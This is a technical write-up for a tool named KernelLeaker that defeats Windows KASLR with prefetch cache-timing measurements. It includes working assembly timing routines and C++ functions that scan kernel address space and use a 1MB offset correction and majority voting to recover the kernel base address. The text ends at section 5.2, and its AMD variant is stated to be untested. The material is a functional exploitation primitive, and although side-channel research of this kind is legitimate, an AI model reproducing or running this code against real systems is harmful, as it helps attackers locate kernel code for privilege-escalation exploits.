KernelLeaker
Defeating KASLR Through Cache Timing Side-Channels: A Deep Dive Into Microarchitectural Exploitation
Abstract
Kernel Address Space Layout Randomization (KASLR) represents one of the fundamental security mechanisms in modern operating systems, designed to prevent exploitation by randomizing the location of kernel code in virtual memory. This work presents a comprehensive analysis of cache timing side-channel attacks capable of defeating KASLR on x64 Windows systems through prefetch instruction timing analysis. The research demonstrates that microarchitectural behavior differences between mapped and unmapped memory pages create measurable timing signatures that can be exploited to leak the kernel base address with high reliability.
The implementation achieves a 100% success rate on an Intel i7-9750H (Dell XPS 7590) through architecture-specific timing analysis and statistical noise filtering. Empirical validation was limited to this one hardware configuration; the methodology is nonetheless intended as a general framework that can be adapted to other CPU vendors and microarchitectural variants.
Table of Contents
- Introduction
- Microarchitectural Foundations
- Timing Measurement Methodology
- Vendor-Specific Signatures
- Statistical Reliability
- Address Space Scanning
- Environmental Optimization
- Practical Results
- AMD Implementation
- Implications
- Future Research
- Building
- Disclaimer
1. Introduction: The KASLR Problem
1.1 The Security Landscape
Modern operating systems employ multiple layers of defense against memory corruption exploits. Among these, Address Space Layout Randomization (ASLR) stands as a critical mitigation technique, randomizing the location of executable code, libraries, and data structures in virtual memory. The kernel-space variant, KASLR, extends this protection to the operating system kernel itself.
On 64-bit Windows systems, the kernel typically resides within the canonical address space range 0xFFFFF80000000000 to 0xFFFFF80800000000. KASLR randomizes the exact base address within this range during boot, creating uncertainty for potential attackers. Without knowledge of the kernel base address, exploitation of kernel vulnerabilities becomes significantly more difficult, as attackers cannot reliably locate kernel functions or data structures.
However, KASLR's security relies on a fundamental assumption: that the randomized address cannot be leaked through side channels. This research demonstrates that this assumption does not hold when considering microarchitectural timing side-channels.
1.2 The Cache Timing Attack Vector
Modern CPUs employ complex cache hierarchies and speculative execution mechanisms to achieve high performance. These optimizations create timing differences that can be measured and exploited. When a CPU attempts to access memory, the operation's latency depends on numerous factors:
- Whether the address is mapped in the page tables
- Whether the data resides in L1, L2, or L3 cache
- Whether the CPU's prefetcher can predict the access pattern
- Whether speculative execution has already loaded the data
The critical insight is this: the CPU's Memory Management Unit (MMU) behaves differently when translating virtual addresses that are mapped versus unmapped. Even though userspace code cannot directly access kernel memory, the mere attempt to prefetch kernel addresses creates measurable timing signatures.
Think of it like this: imagine a library with restricted sections. You cannot enter the restricted section, but you can ask the librarian if a book exists there. If the librarian takes 5 seconds to respond "access denied" for real books versus 1 second for non-existent books, you have learned something about the library's inventory without ever accessing the restricted section. The CPU's timing behavior is our "librarian response time."
1.3 Research Scope and Limitations
This research was conducted exclusively on an Intel i7-9750H processor (Coffee Lake microarchitecture) in a Dell XPS-7590 laptop running Windows 11 25H2 Build 26200.7019. The achieved success rate of 100% across multiple test iterations demonstrates the technique's reliability on this specific configuration.
However, several important limitations must be acknowledged:
Hardware Diversity: Modern CPU architectures vary significantly in their cache hierarchies, prefetch mechanisms, and MMU implementations. Intel, AMD, and ARM processors each exhibit distinct timing characteristics. The AMD-specific implementation presented here represents educated hypotheses based on documented architectural differences, but lacks empirical hardware validation.
Microarchitectural Evolution: Newer CPU generations (Intel 12th gen and beyond, AMD Zen 4+) may implement different prefetch behaviors or timing characteristics. They may prove more vulnerable, equally vulnerable, or more resistant to these techniques. Without access to diverse hardware configurations, definitive statements cannot be made.
Mitigation Awareness: CPU vendors continuously evolve their microarchitectural designs. Some timing channels may be inadvertently closed or widened in future silicon revisions. The technique's longevity across CPU generations remains an open question.
Despite these constraints, the methodology demonstrates fundamental principles of cache timing analysis that transcend specific hardware implementations. The statistical techniques, noise filtering algorithms, and vendor-specific adaptation strategies provide a framework applicable to future research.
2. Microarchitectural Foundations
2.1 CPU Cache Hierarchy: A Primer
To understand cache timing attacks, we must first understand what caches actually are and why they exist. Modern CPUs operate at frequencies measured in gigahertz (billions of cycles per second), while main memory (RAM) operates at much slower speeds. This speed disparity creates a fundamental performance bottleneck.
Consider these approximate access latencies on a typical modern Intel CPU:
- L1 Cache: ~4 cycles (~1 nanosecond at 3GHz)
- L2 Cache: ~12 cycles (~4 nanoseconds)
- L3 Cache: ~40-75 cycles (~15-25 nanoseconds)
- Main Memory (RAM): ~200-300 cycles (~100 nanoseconds)
The performance difference is not linear - it is multiplicative. An L1 cache hit is roughly 50-75 times faster than a main memory access. This is why modern CPUs dedicate significant die space to cache memory.
A real-world analogy helps here: imagine you are a chef in a kitchen. Your L1 cache is the counter directly in front of you - ingredients here are instantly accessible. Your L2 cache is the refrigerator - a few steps away, requiring a moment to open and retrieve items. Your L3 cache is the pantry down the hall - requires walking but still relatively quick. Main memory is the grocery store - requires leaving the building entirely.
If you are cooking and need salt, you would much prefer it to be on your counter (L1) rather than requiring a trip to the store (RAM). The CPU faces the same preference.
2.2 Cache Lines and Spatial Locality
Caches do not store individual bytes - they store cache lines, typically 64 bytes in modern x64 architectures. When you access a single byte at address 0x1000, the CPU loads the entire cache line containing addresses 0x1000-0x103F (assuming 64-byte alignment).
This design exploits spatial locality: if you access one memory location, you are likely to access nearby locations soon. Arrays, structures, and sequential code all exhibit spatial locality.
The mathematical implication is important: each cache line covers 2^6 = 64 bytes. A 32KB L1 cache therefore contains 32768 / 64 = 512 cache lines. Which lines a given address may occupy is determined by the cache's associativity, and the cache must maintain metadata (tags) tracking which address each cache line currently holds.
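The cache-line arithmetic above can be checked with a minimal sketch. The 64-byte line size is an assumption that matches the text, and the function names are illustrative only; they do not come from the tool.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Assumed line size for this sketch: 64 bytes, as stated in the text.
constexpr std::uint64_t kCacheLineSize = 64;

// Base address of the cache line containing `addr` (clears the low 6 bits).
constexpr std::uint64_t cache_line_base(std::uint64_t addr) {
    return addr & ~(kCacheLineSize - 1);
}

// Last byte address covered by the same cache line.
constexpr std::uint64_t cache_line_last(std::uint64_t addr) {
    return cache_line_base(addr) + kCacheLineSize - 1;
}

// Number of lines in a cache of `cache_bytes` bytes.
inline std::size_t cache_line_count(std::size_t cache_bytes) {
    assert(cache_bytes % kCacheLineSize == 0);  // whole number of lines expected
    return static_cast<std::size_t>(cache_bytes / kCacheLineSize);
}

static_assert(cache_line_base(0x1000) == 0x1000, "0x1000 is already line-aligned");
static_assert(cache_line_last(0x1000) == 0x103F, "line spans 0x1000-0x103F");
```

Any byte inside 0x1000-0x103F maps to the same line base, which is why a single access brings in its 63 neighbours.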
2.3 The Prefetch Mechanism
Modern CPUs do not wait passively for memory requests - they anticipate them. Hardware prefetchers monitor memory access patterns and speculatively load data into cache before it is explicitly requested.
The x64 instruction set includes explicit prefetch instructions that allow software to provide hints to the CPU:
prefetchnta byte ptr [address] ; Non-temporal, bypasses cache
prefetcht0 byte ptr [address] ; Prefetch to all cache levels
prefetcht1 byte ptr [address] ; Prefetch to L2 and L3
prefetcht2 byte ptr [address] ; Prefetch to L3 only
These instructions do not cause page faults if the address is unmapped. According to Intel's architecture manual, prefetch instructions that reference unmapped pages are treated as NOPs (no operation). However - and this is critical - the CPU must still consult the MMU to determine whether the page is mapped.
This MMU consultation takes time. And this time is measurable.
2.4 The MMU and Page Table Walks
The Memory Management Unit (MMU) translates virtual addresses to physical addresses using page tables. On x64 systems, this involves a four-level page table hierarchy:
- Page Map Level 4 (PML4)
- Page Directory Pointer Table (PDPT)
- Page Directory (PD)
- Page Table (PT)
For a mapped kernel address, the MMU traverses these tables, finds the physical page, and caches the translation in the Translation Lookaside Buffer (TLB). For an unmapped address, the traversal fails at some level, and no TLB entry is created.
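To make the four-level walk concrete, the sketch below splits a virtual address into the index used at each level. It assumes standard 48-bit x64 paging with 4KB pages; the struct and function names are hypothetical and do not appear in the tool.

```cpp
#include <cassert>
#include <cstdint>

// Indices selected by a 48-bit virtual address under 4-level paging (4KB pages).
struct PageWalkIndices {
    std::uint16_t pml4;    // bits 47..39
    std::uint16_t pdpt;    // bits 38..30
    std::uint16_t pd;      // bits 29..21
    std::uint16_t pt;      // bits 20..12
    std::uint16_t offset;  // bits 11..0
};

// An address is canonical when bits 63..47 are all zeros or all ones.
inline bool is_canonical(std::uint64_t va) {
    const std::uint64_t top = va >> 47;
    return top == 0 || top == 0x1FFFF;
}

inline PageWalkIndices decompose(std::uint64_t va) {
    assert(is_canonical(va));
    return PageWalkIndices{
        static_cast<std::uint16_t>((va >> 39) & 0x1FF),
        static_cast<std::uint16_t>((va >> 30) & 0x1FF),
        static_cast<std::uint16_t>((va >> 21) & 0x1FF),
        static_cast<std::uint16_t>((va >> 12) & 0x1FF),
        static_cast<std::uint16_t>(va & 0xFFF),
    };
}
```

For example, 0xFFFFF80000000000 selects PML4 entry 0x1F0 with all lower indices zero, so every address in the scanned kernel range shares the same top-level entry.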
The timing difference arises from several factors:
TLB Hits vs Misses: If a translation is already in the TLB, lookup is extremely fast (~1 cycle). A TLB miss requires a full page table walk, consuming 10-20+ cycles depending on where the walk terminates.
Cache Behavior: Page table entries themselves may be cached in L1/L2/L3. A page table walk for a frequently-accessed kernel region will hit in cache, while a walk for an unmapped address will miss.
Speculative Execution: Modern CPUs speculatively execute beyond prefetch instructions. For mapped addresses, speculation may successfully load data. For unmapped addresses, speculation must be squashed when the unmapped status is determined.
These factors combine to create measurable timing differences between mapped and unmapped addresses.
3. Timing Measurement Methodology
3.1 The Time Stamp Counter (TSC)
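The x64 architecture provides the RDTSC (Read Time Stamp Counter) instruction, which reads a 64-bit counter. On modern systems, the TSC is invariant: it increments at a constant reference rate regardless of frequency scaling or power management, so one TSC tick corresponds to a fixed amount of time rather than to one core clock cycle at the current frequency. The timings in this document are TSC ticks, referred to as "cycles" for brevity.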
However, RDTSC alone is insufficient for precise timing measurements because:
- It is not serializing - the CPU may execute it out-of-order
- Speculative execution may distort results
- Memory operations may be reordered around it
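The x64 architecture also provides RDTSCP, which waits until all prior instructions have executed before reading the TSC. It is not a fully serializing instruction, because later instructions may begin executing before the read completes, so it is combined with fence instructions (LFENCE, MFENCE) to bracket the measured region and obtain precise timing measurements.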
3.2 Serialization and Timing Precision
The assembly implementation in sidechannel.asm demonstrates proper serialization:
sidechannel PROC
push rbx
push rsi
push rdi
mov rsi, rcx ; Save target address
; Establish clean timing baseline
mfence ; Memory fence - drain pending stores
rdtscp ; Read TSC (waits for prior instructions to execute)
mov r9, rax ; Save low 32 bits
mov r8, rdx ; Save high 32 bits
xor eax, eax ; Clear state
lfence ; Load fence - prevent speculation
; Execute prefetch operations
prefetchnta byte ptr [rsi] ; Non-temporal prefetch
prefetcht2 byte ptr [rsi] ; T2 hint - prefetch to L3
; Capture completion timestamp
lfence ; Ensure prefetches complete
rdtscp ; Read ending TSC
mov edi, eax ; Save low 32 bits
mov esi, edx ; Save high 32 bits
mfence ; Ensure global visibility
; Calculate elapsed cycles
mov rbx, r8
shl rbx, 32 ; Shift high to upper 32 bits
or rbx, r9 ; RBX = start timestamp (64-bit)
mov rax, rsi
shl rax, 32
or rax, rdi ; RAX = end timestamp (64-bit)
sub rax, rbx ; Elapsed cycles
pop rdi
pop rsi
pop rbx
ret
sidechannel ENDP
Let us analyze the mathematical precision here:
The TSC is read as two 32-bit values: EDX:EAX (high:low). To reconstruct the full 64-bit timestamp:
timestamp = (high << 32) | low
timestamp = high * 2^32 + low
For example, if EDX=0x00000005 and EAX=0xA0000000:
timestamp = 0x0000000500000000 | 0xA0000000
timestamp = 0x00000005A0000000
timestamp = 5 * 4294967296 + 2684354560
timestamp = 24159191040 cycles
At 3GHz CPU frequency, this represents approximately 8.05 seconds of CPU time.
The elapsed time calculation is simple subtraction:
elapsed = end_timestamp - start_timestamp
However, achieving single-digit cycle precision requires careful ordering. The MFENCE instruction ensures all pending stores are globally visible. The LFENCE instruction prevents later instructions from executing until earlier ones have completed. RDTSCP waits for all earlier instructions to execute before it reads the counter, but does not by itself stop later instructions from starting early, which is why it is paired with LFENCE.
Without these barriers, the CPU might speculatively execute the prefetch before the starting RDTSCP, or the ending RDTSCP might execute before the prefetch completes, completely invalidating the measurement.
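The timestamp reconstruction and elapsed-time arithmetic from this section can be sketched in portable C++. This mirrors only the integer arithmetic, not the serialized measurement itself. The function names are illustrative, and the 3GHz rate is the same assumption the text uses.

```cpp
#include <cassert>
#include <cstdint>

// Rebuild the 64-bit timestamp from the EDX:EAX halves returned by RDTSC/RDTSCP.
constexpr std::uint64_t combine_tsc(std::uint32_t high, std::uint32_t low) {
    return (static_cast<std::uint64_t>(high) << 32) | low;
}

// Elapsed ticks between two timestamps taken on the same core.
inline std::uint64_t elapsed_ticks(std::uint64_t start, std::uint64_t end) {
    assert(end >= start);  // the counter does not run backwards on one core
    return end - start;
}

// Convert ticks to seconds for an assumed, fixed tick rate in Hz.
inline double ticks_to_seconds(std::uint64_t ticks, double ticks_per_second) {
    return static_cast<double>(ticks) / ticks_per_second;
}

static_assert(combine_tsc(0x5, 0xA0000000u) == 0x00000005A0000000ull,
              "matches the worked example in the text");
```

Casting `high` to 64 bits before shifting matters: shifting a 32-bit value left by 32 is undefined behavior in C++, which is the same reason the assembly performs the shift in a 64-bit register.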
3.3 Statistical Noise and Measurement Stability
Even with perfect serialization, timing measurements exhibit noise from numerous sources:
- CPU frequency scaling (turbo boost, power management)
- Operating system interrupts
- SMI (System Management Interrupts)
- Thermal throttling
- Cache evictions from other processes
- TLB evictions
- Branch prediction effects
A single measurement is essentially useless. We must collect multiple samples and apply statistical analysis.
The implementation collects 256 measurements per address (config::ITERATIONS = 0x100) plus 5 warm-up measurements that are discarded. The warm-up phase is critical - the first few measurements often exhibit anomalous timing due to cold caches and CPU state transitions.
The average timing for an address is then:
average_timing = (sum of 256 measurements) / 256
This averaging process reduces random noise by a factor of sqrt(256) = 16, according to standard error reduction principles in statistics. If individual measurements have standard deviation s, the average of N measurements has standard deviation s/sqrt(N).
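A minimal sketch of the averaging step follows, assuming the samples have already been collected into a vector. It discards a configurable number of warm-up samples and evaluates the s/sqrt(N) relationship. The names are hypothetical and the tool's own collection code may be organized differently.

```cpp
#include <cassert>
#include <cmath>
#include <cstddef>
#include <cstdint>
#include <numeric>
#include <vector>

// Mean of the samples that remain after discarding the first `warmup` entries.
// Returns 0.0 when nothing remains.
double mean_after_warmup(const std::vector<std::uint64_t>& samples, std::size_t warmup) {
    if (samples.size() <= warmup) return 0.0;
    const auto first = samples.begin() + static_cast<std::ptrdiff_t>(warmup);
    const std::uint64_t sum = std::accumulate(first, samples.end(), std::uint64_t{0});
    return static_cast<double>(sum) / static_cast<double>(samples.size() - warmup);
}

// Standard deviation of the mean of n independent samples,
// each with standard deviation s.
double standard_error(double s, std::size_t n) {
    assert(n > 0);
    return s / std::sqrt(static_cast<double>(n));
}
```

The sqrt(N) reduction holds only for independent noise. Correlated disturbances, such as a sustained frequency change during the batch, are not averaged away.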
3.4 The Mode vs Mean Problem
Initially, the implementation used arithmetic mean (average) to characterize the baseline timing. This proved problematic because timing distributions for cache side-channel attacks are often bimodal - they exhibit two distinct peaks.
Consider a dataset of timing measurements across the kernel address space:
- 500 addresses are unmapped: timings cluster around 60 cycles
- 12 addresses are mapped (kernel base): timings cluster around 30 cycles
The arithmetic mean would be:
mean = (500 * 60 + 12 * 30) / 512
mean = (30000 + 360) / 512
mean = 59.3 cycles
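This mean sits below the 60-cycle unmapped peak because the mapped minority drags it down, so it does not represent the "typical" unmapped timing. In this small example the shift is under one cycle, but the detection thresholds used later are small fractions of the baseline, and in real data a handful of large outliers (for example, measurements disturbed by an interrupt) can move the mean much further.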
The mode (most frequent value) solves this problem. In the above example, 60 cycles appears 500 times, while 30 cycles appears only 12 times. The mode is 60 cycles - precisely the unmapped baseline we need to identify.
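The worked example above can be reproduced with a small sketch. The dataset is the illustrative 500/12 split from the text, not measured data, and the helper names are hypothetical. It uses an ordered map for brevity.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <map>
#include <numeric>
#include <vector>

// Illustrative dataset from the text: 500 samples at 60 cycles, 12 at 30 cycles.
std::vector<std::uint64_t> make_example_timings() {
    std::vector<std::uint64_t> t(std::size_t{500}, std::uint64_t{60});
    t.insert(t.end(), std::size_t{12}, std::uint64_t{30});
    return t;
}

double mean_of(const std::vector<std::uint64_t>& t) {
    assert(!t.empty());
    const std::uint64_t sum = std::accumulate(t.begin(), t.end(), std::uint64_t{0});
    return static_cast<double>(sum) / static_cast<double>(t.size());
}

// Most frequent value; ties resolve to the smallest value because std::map
// iterates in ascending key order. Returns 0 for an empty input.
std::uint64_t mode_of(const std::vector<std::uint64_t>& t) {
    std::map<std::uint64_t, std::size_t> counts;
    for (std::uint64_t v : t) ++counts[v];
    std::uint64_t best = 0;
    std::size_t best_count = 0;
    for (const auto& entry : counts) {
        if (entry.second > best_count) {
            best_count = entry.second;
            best = entry.first;
        }
    }
    return best;
}
```

On this dataset the mean comes out at 59.296875 while the mode is exactly 60, which is the value the baseline should report.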
The implementation uses a hash map to compute the mode in O(N) time:
uint64_t KernelLeaker::calculate_most_frequent(
const std::array<uint64_t, config::ARRAY_SIZE>& data)
{
std::unordered_map<uint64_t, size_t> frequency_map;
uint64_t max_count = 0;
uint64_t most_frequent_value = 0;
for (const auto& timing : data) {
size_t current_count = ++frequency_map[timing];
if (current_count > max_count) {
max_count = current_count;
most_frequent_value = timing;
}
}
return most_frequent_value;
}
This replaced an earlier O(N^2) nested loop implementation. The hash map provides O(1) average-case insertion and lookup, reducing the overall complexity from O(N^2) to O(N). For N=512 addresses, this represents a 512x speedup - from ~262,000 operations to ~512 operations.
The algorithmic improvement is not just about performance; it is about practicality. The mode is recomputed on every leak attempt, and the slower the analysis step, the more system state can drift between successive attempts. An O(N) pass that completes in microseconds keeps the attempts close together in time.
4. Vendor-Specific Microarchitectural Signatures
4.1 Intel vs AMD: Inverted Timing Signatures
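The most surprising finding during this research was that Intel and AMD processors appear to exhibit opposite timing characteristics for the same attack. The Intel behavior was measured directly; the AMD behavior is a hypothesis based on documented architectural differences and was not validated on hardware (see Section 1.3):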
- Intel Processors: Mapped kernel pages exhibit LOWER timing (faster prefetch)
- AMD Processors: Mapped kernel pages exhibit HIGHER timing (slower prefetch)
This inversion is not arbitrary - it reflects fundamental differences in microarchitectural design philosophy.
4.2 Intel Microarchitecture: Aggressive Speculation
Intel's design prioritizes speculative execution and prefetch aggressiveness. When a prefetch instruction references a mapped address:
- The MMU quickly validates the mapping via TLB or cached page tables
- The CPU speculatively loads the cache line
- The prefetch completes in ~30-40 cycles (typical)
When the prefetch references an unmapped address:
- The MMU attempts translation, traversing page tables
- The traversal fails, no TLB entry is created
- The CPU must handle the failed translation
- The prefetch completes in ~60-80 cycles (typical)
The timing differential on the Intel i7-9750H is approximately 2:1 (unmapped:mapped).
The Intel-specific leak implementation exploits this by searching for consecutive addresses whose timing falls below the baseline (the mode of all measurements):
std::optional<uint64_t> KernelLeaker::leak_intel() const {
auto data = collect_timings();
avg_timing_ = static_cast<uint32_t>(calculate_most_frequent(data));
// Clamp outliers to average
for (size_t i = 0; i < config::ARRAY_SIZE; ++i) {
if (i == 0) continue;
if (data[i] > avg_timing_) {
data[i] = avg_timing_;
}
}
const uint32_t thresh_1 = avg_timing_ / 10;
const uint32_t thresh_2 = avg_timing_ / 30;
// Search for consecutive low-timing sections
for (size_t i = 0; i < config::ARRAY_SIZE - config::KERNEL_SECTIONS; ++i) {
uint32_t section_avg = 0;
bool section_valid = true;
for (size_t x = 0; x < config::KERNEL_SECTIONS; ++x) {
if (data[i + x] >= avg_timing_ - thresh_2) {
section_valid = false;
break;
}
section_avg += static_cast<uint32_t>(data[i + x]);
}
if (!section_valid) continue;
section_avg /= static_cast<uint32_t>(config::KERNEL_SECTIONS);
if (section_avg < (avg_timing_ - thresh_1)) {
return index_to_address(i);
}
}
return std::nullopt;
}
The threshold calculation is interesting from a signal processing perspective. If the mode (baseline unmapped timing) is M, we search for sections where:
section_average < M - (M / 10)
section_average < 0.9M
And require all individual measurements in the section to satisfy:
individual_timing < M - (M / 30)
individual_timing < 0.967M
This creates a two-tier filter: a loose per-measurement requirement (below 96.7% of baseline) and a stricter aggregate requirement (section average below 90% of baseline). Every measurement in the section must show at least a small dip, but a measurement that falls only slightly below baseline does not disqualify the section as long as the section as a whole averages well below it.
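The two-tier test can be isolated into a small predicate. This is a sketch of the same threshold arithmetic used in leak_intel, using integer division as in the listing. The function name and the vector-based interface are assumptions made for illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Returns true when every timing is below baseline - baseline/30 and the
// section average is below baseline - baseline/10 (integer arithmetic).
bool section_passes(const std::vector<std::uint32_t>& section, std::uint32_t baseline) {
    assert(!section.empty());
    const std::uint32_t avg_margin = baseline / 10;         // thresh_1 in the listing
    const std::uint32_t individual_margin = baseline / 30;  // thresh_2 in the listing

    std::uint64_t sum = 0;
    for (std::uint32_t timing : section) {
        // Tier 1: each measurement must dip at least slightly below baseline.
        if (timing >= baseline - individual_margin) return false;
        sum += timing;
    }
    // Tier 2: the section as a whole must sit well below baseline.
    const std::uint64_t average = sum / section.size();
    return average < baseline - avg_margin;
}
```

With a baseline of 60, each timing must be below 58 and the average below 54. A section of eleven 30-cycle readings plus one 57-cycle reading passes; the same section with a 58-cycle reading fails on the per-measurement tier; twelve 57-cycle readings fail on the average.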
4.3 The Intel Simplified Approach
During development, an even simpler Intel approach emerged that proved more reliable:
std::optional<uint64_t> KernelLeaker::leak_intel_simple() const {
auto data = collect_timings();
// Find address with ABSOLUTE MINIMUM timing
uint64_t min_timing = ~0ull;
uint64_t best_addr = 0;
for (size_t i = 0; i < config::ARRAY_SIZE; ++i) {
if (data[i] < min_timing) {
min_timing = data[i];
best_addr = index_to_address(i);
}
}
// Correct for 1MB offset
uint64_t corrected_addr = best_addr - 0x100000;
return corrected_addr;
}
This approach is almost embarrassingly simple: find the address with the absolute minimum timing, then subtract 1MB (0x100000 bytes).
Why the 1MB offset correction is necessary:
The kernel base itself is not always the lowest-timing address. Empirical testing reveals that the memory region at kernel_base + 1MB consistently exhibits the absolute minimum timing. A plausible explanation, which was not verified independently in this work, is the following:
1. Windows NT Kernel Image Structure:
kernel_base + 0x000000: PE header and code sections (.text)
kernel_base + 0x100000: Data sections (.data, .rdata, initialized data, page tables)
2. Prefetcher Behavior:
- Code sections are often "cold" - executed once during initialization and rarely accessed afterward
- Data sections contain frequently-accessed kernel structures (scheduler queues, memory management, process lists)
- CPU prefetchers are optimized for data access patterns, not infrequently-executed code
3. Cache Warming Effect:
- The first MB of the kernel (PE header + initialization code) may be evicted from cache after boot
- Subsequent data sections remain "hot" in L2/L3 cache due to continuous kernel operations
- Hot cache entries create persistent TLB entries with lower access latency
4. Memory Access Patterns:
- Kernel initialization code executes once at boot time
- Kernel data structures are accessed thousands of times per second during normal operation
- This creates a measurable timing differential favoring the data section region
Analogy: Think of a reference book. The table of contents (PE header) is consulted rarely, while frequently-referenced chapters (data sections) remain bookmarked and instantly accessible. The CPU cache behaves similarly - it keeps the "popular pages" readily available.
The mathematical elegance of this approach is its robustness. Complex threshold calculations and statistical filters are fragile - they depend on assumptions about the noise distribution. Simply finding the minimum is parameter-free and works even if the overall timing distribution shifts.
On Intel i7-9750H, this simplified approach achieves 100% reliability with the voting mechanism described later.
4.4 AMD Microarchitecture: Speculative Penalties
AMD's Zen microarchitecture is expected to exhibit the opposite behavior: when a prefetch instruction references a mapped kernel address, the timing is HIGHER (slower) than for unmapped addresses. As noted in Section 1.3, this expectation was not validated on AMD hardware.
If it holds, the inverted behavior likely stems from AMD's speculative execution security mitigations. After the Spectre and Meltdown disclosures, AMD implemented more conservative speculative bounds checking. When speculation crosses privilege boundaries (userspace prefetching kernel addresses), additional validation occurs even for mapped pages.
For unmapped addresses, the MMU quickly determines "not mapped" and the prefetch becomes a NOP. For mapped addresses, the MMU must perform additional privilege checks, even though the prefetch itself will not violate permissions.
The expected result (an estimate, not a measurement): mapped addresses take ~80-100 cycles, unmapped addresses take ~40-50 cycles.
The AMD leak implementation searches for HIGHER timing clusters:
std::optional<uint64_t> KernelLeaker::leak_amd() const {
auto data = collect_timings();
uint64_t noise_peak = calculate_most_frequent(data);
std::vector<uint64_t> signal_timings;
const uint32_t noise_threshold = static_cast<uint32_t>(noise_peak / 6);
for (size_t i = 0; i < config::ARRAY_SIZE; ++i) {
if (data[i] > noise_peak + noise_threshold) {
signal_timings.push_back(data[i]);
}
}
if (signal_timings.empty()) {
return std::nullopt;
}
uint64_t signal_total = 0;
for (const auto& timing : signal_timings) {
signal_total += timing;
}
uint32_t signal_avg = static_cast<uint32_t>(signal_total / signal_timings.size());
// Normalize sub-threshold values to noise floor
for (size_t i = 0; i < config::ARRAY_SIZE; ++i) {
if (data[i] < noise_peak) {
data[i] = noise_peak;
}
}
// Search for consecutive high-timing sections
for (size_t i = 0; i < config::ARRAY_SIZE - config::KERNEL_SECTIONS; ++i) {
uint32_t section_avg = 0;
bool section_valid = true;
for (size_t x = 0; x < config::KERNEL_SECTIONS; ++x) {
if (data[i + x] <= noise_peak + noise_threshold / 2) {
section_valid = false;
break;
}
section_avg += static_cast<uint32_t>(data[i + x]);
}
if (!section_valid) continue;
section_avg /= static_cast<uint32_t>(config::KERNEL_SECTIONS);
if (section_avg > noise_peak + noise_threshold) {
return index_to_address(i);
}
}
return std::nullopt;
}
The bimodal separation logic is crucial here. We first identify the noise peak (unmapped timing mode), then extract all measurements that significantly exceed this peak:
signal_condition: timing > noise_peak + (noise_peak / 6)
This creates a secondary distribution containing only the candidate mapped-address timings. Averaging it yields signal_avg, a characterization of "typical mapped timing" uncontaminated by the unmapped majority. In the listing above, signal_avg is computed but not used by the section search that follows, which relies only on noise_peak and noise_threshold.
The section search then requires:
section_average > noise_peak + noise_threshold
This is the inverse of the Intel logic, reflecting the inverted timing signature.
4.5 CPU State Stabilization
Between timing measurements, CPU microarchitectural state must be stabilized. Branch prediction buffers, prefetch streams, and speculative execution windows carry state from previous measurements that can contaminate subsequent measurements.
The implementation uses a clever trick - an invalid syscall:
bad_syscall PROC
mov eax, 99999 ; Invalid syscall number
syscall ; Kernel transition
ret
bad_syscall ENDP
Syscall number 99999 does not exist in the Windows kernel. The syscall instruction transitions to kernel mode, the kernel immediately returns an error code, and execution returns to userspace.
Why does this help? The kernel transition flushes the CPU pipeline, clears speculative state, and forces completion of all pending memory operations. It acts as a heavyweight serialization barrier that resets the CPU to a clean state.
In the listing below it is called once per address, at the start of each batch of timing measurements:
int KernelLeaker::average_sidechannel(void* addr) const {
bad_syscall(); // Stabilize state
uint64_t total = sidechannel(addr);
for (size_t i = 0; i < config::ITERATIONS; ++i) {
total += sidechannel(addr);
}
return static_cast<int>(total / (config::ITERATIONS + 1));
}
The performance cost is minimal (~1000 cycles per syscall) compared to the measurement accuracy benefit.
5. Statistical Reliability Through Voting
5.1 The Consensus Mechanism
Even with perfect microarchitectural understanding, side-channel attacks exhibit probabilistic behavior. Thermal conditions, system load, and interrupt activity all introduce noise that cannot be fully eliminated.
Early versions of this tool used a simple retry mechanism: attempt the leak, if it fails, retry; if it succeeds twice consecutively with the same result, accept it. This proved unreliable because consecutive successes could represent correlated noise rather than true signal.
The improved approach uses majority voting:
std::optional<uint64_t> KernelLeaker::leak_with_retry(
std::optional<uint64_t> (KernelLeaker::*leak_fn)() const) const
{
constexpr size_t MAX_ATTEMPTS = 7;
constexpr size_t REQUIRED_CONSENSUS = 4;
std::unordered_map<uint64_t, size_t> vote_count;
for (size_t attempt = 0; attempt < MAX_ATTEMPTS; ++attempt) {
auto current_leak = (this->*leak_fn)();
if (!current_leak) continue;
uint64_t addr = *current_leak;
size_t votes = ++vote_count[addr];
if (votes >= REQUIRED_CONSENSUS) {
return addr; // Early exit on consensus
}
}
// Find winner if no early consensus
if (vote_count.empty()) {
return std::nullopt;
}
uint64_t winner = 0;
size_t max_votes = 0;
for (const auto& [addr, votes] : vote_count) {
if (votes > max_votes) {
max_votes = votes;
winner = addr;
}
}
return winner;
}
The mathematics of this approach is based on the binomial distribution. Assume each attempt independently returns the correct address with probability p, and that wrong answers are spread across N_wrong candidates with probability q = (1-p)/N_wrong each. The probability that the correct address reaches the 4-vote threshold within 7 attempts is then:
P(consensus on correct answer) = C(7,4) * p^4 * (1-p)^3
+ C(7,5) * p^5 * (1-p)^2
+ C(7,6) * p^6 * (1-p)
+ p^7
Where C(n,k) is the binomial coefficient "n choose k".
For p = 0.8 (80% per-attempt accuracy):
P(consensus) ≈ 0.97 (97% overall reliability)
For p = 0.6 (60% per-attempt accuracy):
P(consensus) ≈ 0.71 (71% overall reliability)
The voting threshold of 4/7 was chosen empirically, balancing speed (early exit on consensus) against reliability (requiring majority agreement).
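The consensus probability can be evaluated numerically with a short sketch. It assumes independent attempts with a fixed per-attempt success probability p, as the formula does. The function names are illustrative and are not part of the tool.

```cpp
#include <cassert>
#include <cmath>

// Binomial coefficient C(n, k), computed in floating point (fine for small n).
double choose(unsigned n, unsigned k) {
    if (k > n) return 0.0;
    double result = 1.0;
    for (unsigned i = 1; i <= k; ++i) {
        result = result * static_cast<double>(n - k + i) / static_cast<double>(i);
    }
    return result;
}

// Probability that at least `required` of `attempts` independent attempts
// succeed, each with success probability p.
double consensus_probability(unsigned attempts, unsigned required, double p) {
    assert(p >= 0.0 && p <= 1.0);
    assert(required <= attempts);
    double total = 0.0;
    for (unsigned k = required; k <= attempts; ++k) {
        total += choose(attempts, k)
               * std::pow(p, static_cast<double>(k))
               * std::pow(1.0 - p, static_cast<double>(attempts - k));
    }
    return total;
}
```

Calling consensus_probability(7, 4, 0.8) gives about 0.967 and consensus_probability(7, 4, 0.6) gives about 0.710. The early exit in leak_with_retry does not change these figures, because stopping once four votes are reached is equivalent to asking whether at least four of seven attempts would have succeeded.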
5.2 Why Seven Attempts?
